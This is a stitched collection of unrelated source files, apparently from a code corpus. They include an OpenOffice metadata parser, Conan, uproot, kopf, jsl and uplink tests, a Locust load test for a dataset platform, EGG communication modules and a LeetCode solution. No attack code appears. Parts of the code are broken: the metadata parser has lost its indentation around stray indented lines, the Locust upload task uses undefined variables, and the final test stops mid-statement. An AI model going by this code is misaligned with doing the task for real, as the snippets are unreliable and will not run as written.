self.tableCount=""
self.imageCount=""
self.objectCount=""
self.pageCount=""
self.paragraphCount=""
self.wordCount=""
self.characterCount=""
self.initialCreator=""
self.creator=""
self.title=""
self.description=""
self.subject=""
self.printedBy=""
self.printDate=""
rnd = str(random.randrange(0, 1001, 3))
zip = zipfile.ZipFile(filepath, 'r')
file('meta'+rnd+'.xml', 'w').write(zip.read('meta.xml'))
zip.close()
# done, ahora a currar con el xml
f = open ('meta'+rnd+'.xml','r')
meta = f.read()
self.carga(meta)
f.close()
os.remove('meta'+rnd+'.xml')
def toString(self):
print "--- Metadata ---"
print " version: " + str(self.version)
print " generator: " + str(self.generator)
print " creation-date: "+ str(self.creationDate)
print " date: "+ str(self.date)
print " language: "+ str(self.language)
print " editing cycles: "+ str(self.editingCycles)
print " editing duration: "+ str(self.editingDuration)
print " table count: "+ str(self.tableCount)
print " image count: "+ str(self.imageCount)
print " object count: " + str(self.objectCount)
print " page count: "+ str(self.pageCount)
print " paragraph count: " + str(self.paragraphCount)
print " word count: "+ str(self.wordCount)
print " character count:" + str(self.characterCount)
print " initial creator:" + str(self.initialCreator)
print " creator:" + str(self.creator)
print " title:" + str(self.title)
print " description:" + str(self.description)
print " subject:" + str(self.subject)
print " printed by:" + str(self.printedBy)
print " print date:" + str(self.printDate)
def carga(self,datos):
try:
p = re.compile('office:version="([\d.]*)"><office:meta>')
self.version = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<meta:generator>(.*)</meta:generator>')
self.generator = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<meta:creation-date>(.*)</meta:creation-date>')
self.creationDate = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<dc:date>(.*)</dc:date>')
self.date = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<dc:language>(.*)</dc:language>')
self.language = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<meta:editing-cycles>(.*)</meta:editing-cycles>')
self.editingCycles = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<meta:editing-duration>(.*)</meta:editing-duration>')
self.editingDuration = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('meta:table-count="(\d*)"')
self.tableCount = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('meta:image-count="(\d*)"')
self.imageCount = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('meta:object-count="(\d*)"')
self.objectCount = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('meta:page-count="(\d*)"')
self.pageCount = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('meta:paragraph-count="(\d*)"')
self.paragraphCount = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('meta:word-count="(\d*)"')
self.wordCount = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('meta:character-count="(\d*)"')
self.characterCount = str (p.findall(datos)[0])
except:
pass
try:
            # Pattern.findall() takes a start position, not flags; compile with re.DOTALL instead.
            p = re.compile('<meta:initial-creator>(.*)</meta:initial-creator>', re.DOTALL)
            self.initialCreator = str(p.findall(datos)[0])
except:
pass
try:
            p = re.compile('<dc:creator>(.*)</dc:creator>', re.DOTALL)
            self.creator = str(p.findall(datos)[0])
except:
pass
try:
p = re.compile('<dc:title>(.*)</dc:title>')
self.title = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<dc:description>(.*)</dc:description>')
self.description = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<dc:subject>(.*)</dc:subject>')
self.subject = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<meta:printed-by>(.*)</meta:printed-by>')
self.printedBy = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<meta:print-date>(.*)</meta:print-date>')
self.printDate = str (p.findall(datos)[0])
except:
pass
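# --- Usage sketch (added for illustration; not part of the original module) ---
# This extractor is Python 2 code (print statements, the file() builtin). A
# minimal, hypothetical use on a single OpenOffice document would be:
#
#   meta = metaInfoOO('/tmp/sample.odt')   # the path is an assumption
#   meta.toString()                        # dump the parsed meta.xml fields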
|
recipes/m4/all/test_package/conanfile.py | rockandsalt/conan-center-index | 562 | 12745006 | <gh_stars>100-1000
from conans import ConanFile, tools
from conans.errors import ConanException
from io import StringIO
import os
import textwrap
class TestPackageConan(ConanFile):
settings = "os", "arch", "compiler", "build_type"
@property
def _m4_input_path(self):
return os.path.join(self.build_folder, "input.m4")
def build(self):
tools.save(self._m4_input_path, textwrap.dedent("""\
m4_define(NAME1, `<NAME>.')
m4_define(NAME2, `Sally')
m4_define(MET, `$1 met $2')
MET(`NAME1', `NAME2')
"""))
def test(self):
if hasattr(self, "settings_build"):
exe_suffix = ".exe" if self.settings.os == "Windows" else ""
m4_bin = os.path.join(self.deps_cpp_info["m4"].rootpath, "bin", "m4" + exe_suffix)
else:
m4_bin = tools.get_env("M4")
if m4_bin is None or not m4_bin.startswith(self.deps_cpp_info["m4"].rootpath):
raise ConanException("M4 environment variable not set")
if not tools.cross_building(self, skip_x64_x86=True):
self.run("{} --version".format(m4_bin), run_environment=True)
self.run("{} -P {}".format(m4_bin, self._m4_input_path))
self.run("m4 -R {0}/frozen.m4f {0}/test.m4".format(self.source_folder), run_environment=True)
output = StringIO()
self.run("{} -P {}".format(m4_bin, self._m4_input_path), output=output)
assert "<NAME>. met Sally" in output.getvalue()
|
tests/test_0220-contiguous-byte-ranges-in-http.py | eic/uproot4 | 133 | 12745007 | # BSD 3-Clause License; see https://github.com/scikit-hep/uproot4/blob/main/LICENSE
from __future__ import absolute_import
import numpy
import pytest
import uproot
@pytest.mark.network
def test():
with uproot.open(
"https://starterkit.web.cern.ch/starterkit/data/advanced-python-2019/RD_distribution.root:tree"
) as f:
whole_branch = f["vchi2_b"].array(library="np")
assert whole_branch[0] == 5.234916687011719
assert whole_branch[-1] == 12.466843605041504
whole_branch = f["mu_pt_sum"].array(library="np")
assert whole_branch[0] == 26.4675350189209
assert whole_branch[-1] == 39.84319305419922
|
testhub/testsuites/qip/test_datasets.py | banrieen/PerfBoard | 146 | 12745026 | <gh_stars>100-1000
""" 测试单(场景)
松山湖AI制造业推理平台性能测试SLI/SLO
1. 通过HTTP接口推送原始数据集和推理脚本(具体数量、频次待定)
2. 平台将数据写入nfs/ceph、数据库的读写性能测试(以及IOPS)
3. 100批量数据标注、图像预览响应测试
4. 数据集、模型的增删改查的接口响应(暂定32x6个模型、数据集)
5. 模型转换测试(暂定32x6个模型、数据集)
6. 数据集转换测试(暂定32x6个模型、数据集)
7. 10x32x6个分布式推理任务调度的稳定性
8. 64mpbs,128Mbps图片流量的负载测试
9. 测试(客户)环境rabbitmq的吞吐量和响应延时
10. 1000次/s的HTTP推理请求失败率
11. 1000次/s的HTTP推理结果请求失败率(上传到平台数据库)
12. 1/1000不良率的告警响应测试
13. master节点在模型转换、数据集转换时IO,CPU,MEM的使用率
14. master、A3010在满载推理业务时的网络负载,IO,CPU,MEM占用率
# ScriptType:performance test
# UpdateDate: 2021.03-4
# Matainer: thomas
# Env: Win10 64bit, python3.8
"""
from locust import HttpUser, TaskSet, task, between
from locust.contrib.fasthttp import FastHttpUser
from locust import events
from locust.clients import HttpSession
import logging
import json
import os
import yaml
import pdb
import hashlib
from testhub.testlib import fake_users
from testhub.testlib import csv_client
TEST_CONF = os.path.join(os.path.abspath(os.path.dirname(os.path.abspath(__file__)) + os.path.sep ), "datas.yaml")
TEST_DATAS = {}
DATA_PREFIX = "songshanhu"
USER_CREDENTIALS = []
def read_test_datas(conf_file=TEST_CONF):
stream = {}
with open(conf_file,'r') as cf:
stream =cf.read()
conf = yaml.safe_load(stream)
return conf
@events.quitting.add_listener
def _(environment, **kw):
if environment.stats.total.fail_ratio > 0.001:
logging.error("Test failed due to failure ratio > 1%")
environment.process_exit_code = 1
elif environment.stats.total.avg_response_time > 5000:
logging.error("Test failed due to average response time ratio > 200 ms")
environment.process_exit_code = 2
elif environment.stats.total.get_response_time_percentile(0.99) > 2000:
logging.error("Test failed due to 95th percentile response time > 800 ms")
environment.process_exit_code = 3
else:
environment.process_exit_code = 0
class Datasets(TaskSet):
""" testsuite
1. 通过HTTP接口推送原始数据集和推理脚本(具体数量、频次待定)
2. 平台将数据写入nfs/ceph、数据库的读写性能测试(以及IOPS)
4. 数据集、模型的增删改查的接口响应(暂定32x6个模型、数据集)
5. 模型转换测试(暂定32x6个模型、数据集)
6. 数据集转换测试(暂定32x6个模型、数据集)
13. master节点在模型转换、数据集转换时IO,CPU,MEM的使用率
14. master、A3010在满载推理业务时的网络负载,IO,CPU,MEM占用率
"""
global TEST_DATAS
datasets_session = {}
def on_start(self):
print("======================= A new test is starting, user will login {} ! =======================".format(TEST_DATAS["ENV"]["HOST"]))
self.client.request("get",TEST_DATAS["RESTFULAPI"]["homepage"])
self.client.header = TEST_DATAS["RESTFULAPI"]["header"]
        # Use the popped credential pair as the login payload.
        account = USER_CREDENTIALS.pop()
        response = self.client.request("post", url=TEST_DATAS["RESTFULAPI"]["login"]["path"], data=account)
result = response.json()
# pdb.set_trace()
try:
if result["success"]:
TEST_DATAS["ACCOUNT"]["token"] = result["token"]
TEST_DATAS["ACCOUNT"]["currentRole_id"] = result["currentRole"][0]["id"]
TEST_DATAS["RESTFULAPI"]["header"]["Authorization"] = "Bearer " + TEST_DATAS["ACCOUNT"]["token"]
TEST_DATAS["RESTFULAPI"]["cookie"] = response.cookies
except KeyError:
response.raise_for_status()
def on_stop(self):
print("======================= A test is ending, user will logout {} ! =======================".format(TEST_DATAS["ENV"]["HOST"]))
response = self.client.request("get", url=TEST_DATAS["RESTFULAPI"]["logout"]["path"])
@task(1)
def test_create_dataset(self):
""" testcases
        1. Register a new user group
"""
datasets_info = fake_users.new_datastes_songshanhu()
with self.client.request("post",url=TEST_DATAS["RESTFULAPI"]["create_group"]["path"],
headers=TEST_DATAS["RESTFULAPI"]["header"],
json=datasets_info) as resp:
self.datasets_session["datasets_id"] = resp["data"]["id"]
self.datasets_session["datasetCode"] = resp["data"]["datasetCode"]
@task(0)
def test_upload_datas(self):
""" testcases
        2. Upload a compressed archive
"""
self.datasets_session["datasets_id"] = resp["data"]["id"]
self.datasets_session["datasetCode"] = resp["data"]["datasetCode"]
with self.client.request("post",url=TEST_DATAS["RESTFULAPI"]["create_group"]["path"],
headers=TEST_DATAS["RESTFULAPI"]["header"],
json=datasets_info) as resp:
self.datasets_session["datasets_uploaded_path"] = resp["data"]
class BasicalDatas(HttpUser):
global TEST_DATAS
global USER_CREDENTIALS
sock = None
wait_time = between(0.5, 2)
TEST_DATAS = read_test_datas(conf_file=TEST_CONF)
USER_CREDENTIALS = [{'userName': ic['userName'], 'password':ic['password'] } for ic in csv_client.csv_reader_as_json(csv_path=TEST_DATAS["ACCOUNT"]["CSV_PATH"]) if "userName" != ic['userName'] ]
host = TEST_DATAS["ENV"]["HOST"]
tasks = [Datasets]
if __name__ == "__main__":
# global DATA_PREFIX
DATA_PREFIX = "songshanhu"
pass
# locust -f testhub/testsuites/songshanhu/test_datasets.py --conf testhub/testsuites/songshanhu/host.conf
|
egg/core/continous_communication.py | vengalraoguttha/EGG | 254 | 12745030 | # Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import Callable, Optional
import torch
import torch.nn as nn
import torch.nn.functional as F
from egg.core.interaction import LoggingStrategy
class ContinuousLinearSender(nn.Module):
def __init__(
self,
agent: nn.Module,
encoder_input_size: int,
encoder_hidden_size: int = 64,
num_layers: int = 1,
activation: str = "relu",
):
super(ContinuousLinearSender, self).__init__()
self.agent = agent
activations = {
"relu": F.relu,
"tanh": F.tanh,
"leaky_relu": F.leaky_relu,
"identity": nn.Identity(),
}
self.activation = activations[activation.lower()]
encoder_hidden_sizes = [encoder_hidden_size] * num_layers
encoder_layer_dimensions = [(encoder_input_size, encoder_hidden_sizes[0])]
for i, hidden_size in enumerate(encoder_hidden_sizes[1:]):
            # `encoder_hidden_sizes` is a local list, not an attribute of self.
            hidden_shape = (encoder_hidden_sizes[i], hidden_size)
encoder_layer_dimensions.append(hidden_shape)
self.encoder_hidden_layers = nn.ModuleList(
[nn.Linear(*dimensions) for dimensions in encoder_layer_dimensions]
)
def forward(self, x, aux_input=None):
x = self.agent(x, aux_input)
for hidden_layer in self.encoder_hidden_layers[:-1]:
x = self.activation(hidden_layer(x))
sender_output = self.encoder_hidden_layers[-1](x)
return sender_output
class ContinuousLinearReceiver(nn.Module):
def __init__(
self,
agent: nn.Module,
):
super(ContinuousLinearReceiver, self).__init__()
self.agent = agent
def forward(self, message, input=None, aux_input=None):
agent_output = self.agent(message, input, aux_input)
return agent_output
class SenderReceiverContinuousCommunication(nn.Module):
def __init__(
self,
sender: nn.Module,
receiver: nn.Module,
loss: Callable,
train_logging_strategy: Optional[LoggingStrategy] = None,
test_logging_strategy: Optional[LoggingStrategy] = None,
):
"""
:param sender: Sender agent. sender.forward() has to output a continouos vector
:param receiver: Receiver agent. receiver.forward() has to accept two parameters:
message and receiver_input.
`message` is shaped as (batch_size, vocab_size).
:param loss: Callable that outputs differentiable loss, takes the following parameters:
* sender_input: input to Sender (comes from dataset)
* message: message sent from Sender
* receiver_input: input to Receiver from dataset
* receiver_output: output of Receiver
* labels: labels that come from dataset
:param train_logging_strategy, test_logging_strategy: specify what parts of interactions to persist for
later analysis in the callbacks.
"""
super(SenderReceiverContinuousCommunication, self).__init__()
self.sender = sender
self.receiver = receiver
self.loss = loss
self.train_logging_strategy = (
LoggingStrategy()
if train_logging_strategy is None
else train_logging_strategy
)
self.test_logging_strategy = (
LoggingStrategy()
if test_logging_strategy is None
else test_logging_strategy
)
def forward(self, sender_input, labels, receiver_input=None, aux_input=None):
message = self.sender(sender_input, aux_input)
receiver_output = self.receiver(message, receiver_input, aux_input)
loss, aux_info = self.loss(
sender_input, message, receiver_input, receiver_output, labels, aux_input
)
logging_strategy = (
self.train_logging_strategy if self.training else self.test_logging_strategy
)
interaction = logging_strategy.filtered_interaction(
sender_input=sender_input,
receiver_input=receiver_input,
labels=labels,
aux_input=aux_input,
receiver_output=receiver_output,
message=message.detach(),
message_length=torch.ones(message[0].size(0)),
aux=aux_info,
)
return loss.mean(), interaction
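# --- Usage sketch (added for illustration; not part of the original module) ---
# A minimal reconstruction-style loss with the signature this game expects; the
# MSE objective and the (batch, features) shapes are assumptions for illustration.
def _example_mse_loss(sender_input, message, receiver_input, receiver_output,
                      labels, aux_input):
    # Per-sample MSE between the Receiver's output and the Sender's input.
    loss = F.mse_loss(receiver_output, sender_input, reduction="none").mean(dim=-1)
    aux = {"mse": loss.detach()}
    return loss, aux


# game = SenderReceiverContinuousCommunication(sender, receiver, _example_mse_loss)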
|
kivy/core/video/video_null.py | Galland/kivy | 13,889 | 12745062 |
'''
VideoNull: empty implementation of VideoBase for the no provider case
'''
from kivy.core.video import VideoBase
class VideoNull(VideoBase):
'''VideoBase implementation when there is no provider.
'''
pass
|
tests/test_iter_methods.py | mail6543210/jsl | 237 | 12745084 | <reponame>mail6543210/jsl<filename>tests/test_iter_methods.py<gh_stars>100-1000
# coding: utf-8
from jsl import (StringField, ArrayField, Var, DictField,
NotField, Document, DocumentField)
from jsl.fields.compound import BaseOfField
a = StringField()
b = StringField()
c = StringField()
d = StringField()
e = StringField()
f = StringField()
g = StringField()
h = StringField()
j = StringField()
def test_array_field():
field = ArrayField(Var({
'role_1': a,
'role_2': b,
'role_none': None,
}), additional_items=Var({
'role_3': c,
'role_4': d,
'role_1': e,
'role_none': None,
}))
assert set(field.iter_fields()) == set([a, b, c, d, e])
assert set(field.resolve_and_iter_fields('role_1')) == set([a, e])
assert set(field.resolve_and_iter_fields('role_3')) == set([c])
assert set(field.resolve_and_iter_fields('role_none')) == set([])
field = ArrayField(Var({
'role_1': (a, b),
'role_2': c
}), additional_items=d)
assert set(field.iter_fields()) == set([a, b, c, d])
field = ArrayField((Var({'role_1': a, 'role_2': b, 'role_none': None}), c))
assert set(field.iter_fields()) == set([a, b, c])
assert set(field.resolve_and_iter_fields('role_1')) == set([a, c])
assert set(field.resolve_and_iter_fields('role_none')) == set([c])
field = ArrayField(a, additional_items=b)
assert set(field.iter_fields()) == set([a, b])
assert set(field.resolve_and_iter_fields('some_role')) == set([a, b])
field = ArrayField()
assert set(field.iter_fields()) == set([])
def test_dict_field():
field = DictField(properties=Var({
'role_1': {
'a': Var({
'role_a': a,
'role_none': None,
}),
'b': b,
'role_none': None,
},
'role_2': {'c': c},
'role_none': None,
}), pattern_properties=Var({
'role_3': {
'x*': Var({
'role_b': d,
'role_none': None,
}),
},
'role_4': {'y*': e},
'role_none': None,
}), additional_properties=Var({
'role_5': f,
'role_6': g,
'role_none': None,
}))
assert set(field.iter_fields()) == set([a, b, c, d, e, f, g])
field = DictField(
properties={'a': a},
pattern_properties={'b': b},
additional_properties=c
)
assert set(field.iter_fields()) == set([a, b, c])
field = DictField()
assert set(field.iter_fields()) == set([])
def test_base_of_field():
field = BaseOfField((a, b))
assert set(field.iter_fields()) == set([a, b])
field = BaseOfField(Var({
'role_1': (a, b),
'role_2': c,
'role_3': None, # probably should raise?
}))
assert set(field.iter_fields()) == set([a, b, c])
def test_not_field():
field = NotField(a)
assert set(field.iter_fields()) == set([a])
assert set(field.resolve_and_iter_fields('some_role')) == set([a])
field = NotField(Var({
'role_1': a,
'role_2': b,
'role_3': None, # probably should raise?
}))
assert set(field.iter_fields()) == set([a, b])
assert set(field.resolve_and_iter_fields('role_1')) == set([a])
assert set(field.resolve_and_iter_fields('role_3')) == set([])
def test_document_field():
class A(Document):
a = a
b = b
field = DocumentField(A)
assert set(field.iter_fields()) == set([a, b])
class B(Document):
field = Var({
'a': a,
'b': b
})
b = c
field = DocumentField(B)
assert set(field.iter_fields()) == set([a, b, c])
class C(Document):
pass
field = DocumentField(C)
assert set(field.iter_fields()) == set([])
|
examples/research/surgery/nds/filter_resnexta_group1.py | Harald-R/aw_nas | 195 | 12745085 | <gh_stars>100-1000
import os
import sys
import yaml
import pickle
from aw_nas import germ
from aw_nas.weights_manager.base import BaseWeightsManager
from aw_nas.common import rollout_from_genotype_str
ss = germ.GermSearchSpace()
wm = BaseWeightsManager.get_class_("germ")(
ss, "cuda", rollout_type="germ",
germ_supernet_type="nds_resnexta",
germ_supernet_cfg={
"num_classes": 10,
"stem_type": "res_stem_cifar",
"group_search": True
}
)
arch_file = sys.argv[1]
gt_file = sys.argv[2]
# ---- parse arch file ----
with open(arch_file, "r") as r_f:
archs = yaml.load(r_f)
nogroup_archs = []
for arch in archs:
rollout = rollout_from_genotype_str(arch, ss)
if all(rollout['num_groups.{}'.format(i)] == 1 for i in range(3)):
# all `num_groups` == 1
[rollout.arch.pop("num_groups.{}".format(i)) for i in range(3)]
nogroup_archs.append(rollout.genotype)
out_arch_fname = os.path.join(os.path.dirname(arch_file), "nogroup_{}".format(os.path.basename(arch_file)))
print("Dumped {} archs to {}".format(len(nogroup_archs), out_arch_fname))
with open(out_arch_fname, "w") as w_f:
yaml.dump(nogroup_archs, w_f)
# ---- parse gt pickle file ----
with open(gt_file, "rb") as r_f:
gt = pickle.load(r_f)
nogroup_gts = []
for arch, param, flops, acc in zip(*gt):
rollout = rollout_from_genotype_str(arch, ss)
if all(rollout['num_groups.{}'.format(i)] == 1 for i in range(3)):
# all `num_groups` == 1
[rollout.arch.pop("num_groups.{}".format(i)) for i in range(3)]
nogroup_gts.append([rollout.genotype, param, flops, acc])
nogroup_gts = list(zip(*nogroup_gts))
out_gt_fname = os.path.join(os.path.dirname(gt_file), "nogroup_{}".format(os.path.basename(gt_file)))
with open(out_gt_fname, "wb") as w_f:
pickle.dump(nogroup_gts, w_f)
print("Dumped {} gt entries to {}".format(len(nogroup_gts[0]), out_gt_fname))
|
tests/authentication/test_login_kubeconfig.py | tavaresrodrigo/kopf | 855 | 12745111 | <gh_stars>100-1000
import os
import pytest
import yaml
from kopf._cogs.structs.credentials import LoginError
from kopf._core.intents.piggybacking import has_kubeconfig, login_with_kubeconfig
MINICONFIG = '''
kind: Config
current-context: ctx
contexts:
- name: ctx
context:
cluster: clstr
user: usr
clusters:
- name: clstr
users:
- name: usr
'''
@pytest.mark.parametrize('envs', [{}, {'KUBECONFIG': ''}], ids=['absent', 'empty'])
def test_has_no_kubeconfig_when_nothing_is_provided(mocker, envs):
exists_mock = mocker.patch('os.path.exists', return_value=False)
mocker.patch.dict(os.environ, envs, clear=True)
result = has_kubeconfig()
assert result is False
assert exists_mock.call_count == 1
assert exists_mock.call_args_list[0][0][0].endswith('/.kube/config')
@pytest.mark.parametrize('envs', [{'KUBECONFIG': 'x'}], ids=['set'])
def test_has_kubeconfig_when_envvar_is_set_but_no_homedir(mocker, envs):
exists_mock = mocker.patch('os.path.exists', return_value=False)
mocker.patch.dict(os.environ, envs, clear=True)
result = has_kubeconfig()
assert result is True
assert exists_mock.call_count == 1
assert exists_mock.call_args_list[0][0][0].endswith('/.kube/config')
@pytest.mark.parametrize('envs', [{}, {'KUBECONFIG': ''}], ids=['absent', 'empty'])
def test_has_kubeconfig_when_homedir_exists_but_no_envvar(mocker, envs):
exists_mock = mocker.patch('os.path.exists', return_value=True)
mocker.patch.dict(os.environ, envs, clear=True)
result = has_kubeconfig()
assert result is True
assert exists_mock.call_count == 1
assert exists_mock.call_args_list[0][0][0].endswith('/.kube/config')
@pytest.mark.parametrize('envs', [{}, {'KUBECONFIG': ''}], ids=['absent', 'empty'])
def test_homedir_is_used_if_it_exists(tmpdir, mocker, envs):
exists_mock = mocker.patch('os.path.exists', return_value=True)
open_mock = mocker.patch('kopf._core.intents.piggybacking.open')
open_mock.return_value.__enter__.return_value.read.return_value = MINICONFIG
mocker.patch.dict(os.environ, envs, clear=True)
credentials = login_with_kubeconfig()
assert exists_mock.call_count == 1
assert exists_mock.call_args_list[0][0][0].endswith('/.kube/config')
assert open_mock.call_count == 1
assert open_mock.call_args_list[0][0][0].endswith('/.kube/config')
assert credentials is not None
@pytest.mark.parametrize('envs', [{}, {'KUBECONFIG': ''}], ids=['absent', 'empty'])
def test_homedir_is_ignored_if_it_is_absent(tmpdir, mocker, envs):
exists_mock = mocker.patch('os.path.exists', return_value=False)
open_mock = mocker.patch('kopf._core.intents.piggybacking.open')
open_mock.return_value.__enter__.return_value.read.return_value = ''
mocker.patch.dict(os.environ, envs, clear=True)
credentials = login_with_kubeconfig()
assert exists_mock.call_count == 1
assert exists_mock.call_args_list[0][0][0].endswith('/.kube/config')
assert open_mock.call_count == 0
assert credentials is None
def test_absent_kubeconfig_fails(tmpdir, mocker):
kubeconfig = tmpdir.join('config')
mocker.patch.dict(os.environ, clear=True, KUBECONFIG=str(kubeconfig))
with pytest.raises(IOError):
login_with_kubeconfig()
def test_corrupted_kubeconfig_fails(tmpdir, mocker):
kubeconfig = tmpdir.join('config')
kubeconfig.write("""!!acb!.-//:""") # invalid yaml
mocker.patch.dict(os.environ, clear=True, KUBECONFIG=str(kubeconfig))
with pytest.raises(yaml.YAMLError):
login_with_kubeconfig()
def test_empty_kubeconfig_fails(tmpdir, mocker):
kubeconfig = tmpdir.join('config')
kubeconfig.write('')
mocker.patch.dict(os.environ, clear=True, KUBECONFIG=str(kubeconfig))
with pytest.raises(LoginError) as err:
login_with_kubeconfig()
assert "context is not set" in str(err.value)
def test_mini_kubeconfig_reading(tmpdir, mocker):
kubeconfig = tmpdir.join('config')
kubeconfig.write(MINICONFIG)
mocker.patch.dict(os.environ, clear=True, KUBECONFIG=str(kubeconfig))
credentials = login_with_kubeconfig()
assert credentials is not None
assert credentials.server is None
assert credentials.insecure is None
assert credentials.scheme is None
assert credentials.token is None
assert credentials.certificate_path is None
assert credentials.certificate_data is None
assert credentials.private_key_path is None
assert credentials.private_key_data is None
assert credentials.ca_path is None
assert credentials.ca_data is None
assert credentials.password is None
assert credentials.username is None
assert credentials.default_namespace is None
def test_full_kubeconfig_reading(tmpdir, mocker):
kubeconfig = tmpdir.join('config')
kubeconfig.write('''
kind: Config
current-context: ctx
contexts:
- name: ctx
context:
cluster: clstr
user: usr
namespace: ns
- name: def
clusters:
- name: clstr
cluster:
server: https://hostname:1234/
certificate-authority-data: base64dataA
certificate-authority: /pathA
insecure-skip-tls-verify: true
- name: hij
users:
- name: usr
user:
username: uname
password: <PASSWORD>
client-certificate-data: base64dataC
client-certificate: /pathC
client-key-data: base64dataK
client-key: /pathK
token: tkn
- name: klm
''')
mocker.patch.dict(os.environ, clear=True, KUBECONFIG=str(kubeconfig))
credentials = login_with_kubeconfig()
assert credentials is not None
assert credentials.server == 'https://hostname:1234/'
assert credentials.insecure == True
assert credentials.scheme is None
assert credentials.token == '<PASSWORD>'
assert credentials.certificate_path == '/pathC'
assert credentials.certificate_data == 'base64dataC'
assert credentials.private_key_path == '/pathK'
assert credentials.private_key_data == 'base64dataK'
assert credentials.ca_path == '/pathA'
assert credentials.ca_data == 'base64dataA'
assert credentials.password == '<PASSWORD>'
assert credentials.username == 'uname'
assert credentials.default_namespace == 'ns'
def test_kubeconfig_with_provider_token(tmpdir, mocker):
kubeconfig = tmpdir.join('config')
kubeconfig.write('''
kind: Config
current-context: ctx
contexts:
- name: ctx
context:
cluster: clstr
user: usr
clusters:
- name: clstr
users:
- name: usr
user:
auth-provider:
config:
access-token: <PASSWORD>
''')
mocker.patch.dict(os.environ, clear=True, KUBECONFIG=str(kubeconfig))
credentials = login_with_kubeconfig()
assert credentials is not None
assert credentials.token == '<PASSWORD>'
def test_merged_kubeconfigs_across_currentcontext(tmpdir, mocker):
kubeconfig1 = tmpdir.join('config1')
kubeconfig1.write('''
kind: Config
current-context: ctx
''')
kubeconfig2 = tmpdir.join('config2')
kubeconfig2.write('''
kind: Config
contexts:
- name: ctx
context:
cluster: clstr
user: usr
namespace: ns
clusters:
- name: clstr
cluster:
server: srv
users:
- name: usr
user:
token: <PASSWORD>
''')
mocker.patch.dict(os.environ, clear=True, KUBECONFIG=f'{kubeconfig1}{os.pathsep}{kubeconfig2}')
credentials = login_with_kubeconfig()
assert credentials is not None
assert credentials.default_namespace == 'ns'
assert credentials.server == 'srv'
assert credentials.token == '<PASSWORD>'
def test_merged_kubeconfigs_across_contexts(tmpdir, mocker):
kubeconfig1 = tmpdir.join('config1')
kubeconfig1.write('''
kind: Config
current-context: ctx
contexts:
- name: ctx
context:
cluster: clstr
user: usr
namespace: ns
''')
kubeconfig2 = tmpdir.join('config2')
kubeconfig2.write('''
kind: Config
clusters:
- name: clstr
cluster:
server: srv
users:
- name: usr
user:
token: tkn
''')
mocker.patch.dict(os.environ, clear=True, KUBECONFIG=f'{kubeconfig1}{os.pathsep}{kubeconfig2}')
credentials = login_with_kubeconfig()
assert credentials is not None
assert credentials.default_namespace == 'ns'
assert credentials.server == 'srv'
assert credentials.token == '<PASSWORD>'
def test_merged_kubeconfigs_first_wins(tmpdir, mocker):
kubeconfig1 = tmpdir.join('config1')
kubeconfig1.write('''
kind: Config
current-context: ctx
contexts:
- name: ctx
context:
cluster: clstr
user: usr
namespace: ns1
clusters:
- name: clstr
cluster:
server: srv1
users:
- name: usr
user:
token: <PASSWORD>
''')
kubeconfig2 = tmpdir.join('config2')
kubeconfig2.write('''
kind: Config
current-context: ctx
contexts:
- name: ctx
context:
cluster: clstr
user: usr
namespace: ns2
clusters:
- name: clstr
cluster:
server: srv2
users:
- name: usr
user:
token: <PASSWORD>
''')
mocker.patch.dict(os.environ, clear=True, KUBECONFIG=f'{kubeconfig1}{os.pathsep}{kubeconfig2}')
credentials = login_with_kubeconfig()
assert credentials is not None
assert credentials.default_namespace == 'ns1'
assert credentials.server == 'srv1'
assert credentials.token == '<PASSWORD>'
|
src/0264.ugly-number-ii/ugly-number-ii.py | lyphui/Just-Code | 782 | 12745125 | class Solution:
def nthUglyNumber(self, n):
ugly = [1]
i2 = i3 = i5 = 0
while len(ugly) < n:
while ugly[i2] * 2 <= ugly[-1]: i2 += 1
while ugly[i3] * 3 <= ugly[-1]: i3 += 1
while ugly[i5] * 5 <= ugly[-1]: i5 += 1
ugly.append(min(ugly[i2] * 2, ugly[i3] * 3, ugly[i5] * 5))
return ugly[-1] |
tests/unit/test_returns.py | lust4life/uplink | 918 | 12745148 | <reponame>lust4life/uplink
# Local imports
from uplink import returns
def test_returns(request_builder):
custom = returns(str)
request_builder.get_converter.return_value = str
request_builder.return_type = returns.ReturnType.with_decorator(
None, custom
)
custom.modify_request(request_builder)
assert request_builder.return_type(2) == "2"
def test_returns_with_multiple_decorators(request_builder, mocker):
decorator1 = returns(str)
decorator2 = returns.json()
request_builder.get_converter.return_value = str
first_type = returns.ReturnType.with_decorator(None, decorator1)
second_type = (
request_builder.return_type
) = returns.ReturnType.with_decorator(
first_type, decorator2
)
# Verify that the return type doesn't change after being handled by first decorator
decorator1.modify_request(request_builder)
assert request_builder.return_type is second_type
# Verify that the second decorator does handle the return type
mock_response = mocker.Mock()
mock_response.json.return_value = {"key": "value"}
decorator2.modify_request(request_builder)
assert request_builder.return_type(mock_response) == str(
mock_response.json()
)
def test_returns_json(request_builder, mocker):
mock_response = mocker.Mock()
mock_response.json.return_value = {"key": "value"}
request_builder.get_converter.return_value = str
returns_json = returns.json(str, ())
request_builder.return_type = returns.ReturnType.with_decorator(
None, returns_json
)
returns_json.modify_request(request_builder)
assert isinstance(request_builder.return_type, returns.ReturnType)
assert callable(request_builder.return_type)
assert request_builder.return_type(mock_response) == str(
mock_response.json()
)
# Verify: Idempotent
returns_json.modify_request(request_builder)
assert isinstance(request_builder.return_type, returns.ReturnType)
assert callable(request_builder.return_type)
assert request_builder.return_type(mock_response) == str(
mock_response.json()
)
# Verify: Doesn't apply to unsupported types
request_builder.get_converter.return_value = None
returns_json = returns.json(str, ())
request_builder.return_type = returns.ReturnType.with_decorator(
